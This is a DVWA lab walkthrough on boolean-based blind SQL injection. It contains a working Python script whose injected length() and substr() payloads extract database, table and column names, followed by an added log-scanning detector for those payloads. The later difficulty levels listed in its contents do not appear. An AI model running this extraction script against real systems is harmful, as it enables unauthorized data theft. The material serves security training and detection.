DVWA Walkthrough: SQL Injection (Blind)

All code in this article can be downloaded from JacquelinXiang/sqli_bool: A simple tool/framework for boolean-based sql injection(GET/POST/COOKIE) (github.com); the README explains how to use it.

This article, like my other original articles, may not be reproduced without permission.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contents

LOW

Walkthrough steps

Code analysis

MEDIUM

Walkthrough steps

Code analysis

HIGH

Walkthrough steps

Code analysis

IMPOSSIBLE

Code analysis


LOW

Walkthrough steps

1. Observe what the page returns:

Enter 1 and press Submit: the page returns User ID exists in the database.

Enter 6 and press Submit: the page returns User ID is MISSING from the database.

This shows that a valid value makes the page return User ID exists in the database, while an invalid value makes it return User ID is MISSING from the database. The page never shows query results, only this true/false signal, which is what a boolean-based blind injection relies on.

2. Find the closing quote

Enter 1' and press Submit: the page returns User ID is MISSING from the database.

Enter 1'' and press Submit: the page returns User ID exists in the database.

So the value is enclosed in single quotes.

3. Dump the database

Doing the rest by hand would be far too slow, so I wrote a Python script to dump the database:

#!/usr/bin/python3
# coding=utf-8

"""
functions for boolean-based sql injection(GET)

:copyright: Copyright (c) 2021, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/dvwa/vulnerabilities/sqli_blind"               # URL of the vulnerable page; fill in for your own setup
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"}    # HTTP request headers; fill in for your own setup
cookies = {"security": "low", "PHPSESSID": "07bucms1va26di95pntpl9qm57"}          # a single cookie can go directly in headers; with two cookies use the dict-form cookies parameter

keylist = [chr(i) for i in range(33, 127)]                                     # digits, upper- and lower-case letters and printable special characters
flag = 'User ID exists in the database'                                        # text shown when the appended SQL condition is true; taken from the page response


def ask(payload):
    """Send one payload by GET and return True when the response contains the 'true' marker."""
    param = {
        "id": payload,
        "Submit": "Submit",
    }
    response = requests.get(url, params=param, headers=headers, cookies=cookies)     # send the request carrying the payload
    # print(response.request.headers)
    # print(response.text)
    return response.text.find(flag) != -1


def find_length(expr, n):
    """Binary-search the length of the SQL expression expr in the range (0, n]; returns 0 if n was too small."""
    k = 0                                                                       # exclusive lower bound
    while n - k > 3:
        j = k + (n - k) // 2                                                   # midpoint of (k, n]; the original (n-k)//2 fell outside the interval after the first step
        if ask("1' and length(" + expr + ")>" + str(j) + "-- ss"):             # all payloads must be adapted to the target
            k = j
        else:
            n = j
    for i in range(k + 1, n + 1):                                              # interval is now small: test the remaining lengths one by one
        if ask("1' and length(" + expr + ")=" + str(i) + "-- ss"):
            return i
    return 0


def extract(expr, length):
    """Recover the value of expr one character at a time, trying every character in keylist per position."""
    result = str()
    for i in range(1, length + 1):
        for c in keylist:
            if ask("1' and substr(" + expr + "," + str(i) + ",1)='" + c + "'-- ss"):
                result = result + c
                break
    return result


def CurrentDatabaseGET():
    n = 10                                                                      # guessed maximum length of the current database name; adjust as needed
    length = find_length("database()", n)
    print("the name of current database contains " + str(length) + " characters")
    db = extract("database()", length)
    print("the name of current database is " + str(db))


def TablesGET():
    n = 100                                                                     # guessed maximum total length of all table names in the current database; adjust as needed
    expr = "(select group_concat(table_name) from information_schema.tables where table_schema = database())"
    length = find_length(expr, n)
    print("the name of all tables in current database contains " + str(length) + " characters")
    tname = extract(expr, length)
    print("the name of all tables in current database is " + str(tname))


def ColumnsGET(table):                                                          # table is the name of the table whose columns are to be enumerated; remember the single quotes
    n = 200                                                                     # guessed maximum total length of all column names in that table; adjust as needed
    expr = "(select group_concat(column_name) from information_schema.columns where table_name = '" + table + "')"
    length = find_length(expr, n)
    print("the name of all columns in current table contains " + str(length) + " characters")
    cname = extract(expr, length)
    print("the name of all columns in current table is " + str(cname))
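Seen from the defender's side, the probes above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original article or of the sqli_bool tool: it scans constructed Apache-style log lines for the fingerprints of this walkthrough's payloads (a quote followed by and/or and a comparison, length(), substr()/substring(), information_schema, the -- comment terminator) and counts flagged requests per client, since character-by-character extraction needs many requests per recovered character.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in Apache combined-log style (not taken from the page);
# the first and last are normal requests, the middle three are this walkthrough's probes, URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+length%28database%28%29%29%3E5--+ss&Submit=Submit HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2021:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+substring%28database%28%29%2C1%2C1%29%3D%27d%27--+ss&Submit=Submit HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2021:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+substr%28%28select+group_concat%28table_name%29+from+information_schema.tables+where+table_schema+%3D+database%28%29%29%2C1%2C1%29%3D%27g%27--+ss&Submit=Submit HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:00:05 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

# Fingerprints of the boolean-blind payloads used in this walkthrough.
PATTERNS = [
    ("quote-and-comparison", re.compile(r"'\s*(and|or)\b.*[<>=]", re.I)),
    ("length-probe", re.compile(r"\blength\s*\(", re.I)),
    ("substring-probe", re.compile(r"\bsubstr(ing)?\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("comment-terminator", re.compile(r"--\s")),
]

def classify_value(value):
    """Return the names of the fingerprints that match one decoded parameter value."""
    return [name for name, rx in PATTERNS if rx.search(value)]

def scan_log(text):
    """Return (ip, param, decoded value, fingerprint names) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so the value is what the database saw
        for param, values in parse_qs(urlparse(m["target"]).query).items():
            for value in values:
                hits = classify_value(value)
                if hits:
                    findings.append((m["ip"], param, value, hits))
    return findings

def probe_counts(findings):
    """Count flagged requests per source IP; a burst from one client is the blind-extraction signature."""
    counts = {}
    for ip, _, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

The per-client count matters as much as the individual match: one odd request can be noise, but dozens of `substr(...)='x'` variations from the same address within seconds are an extraction loop like the script above.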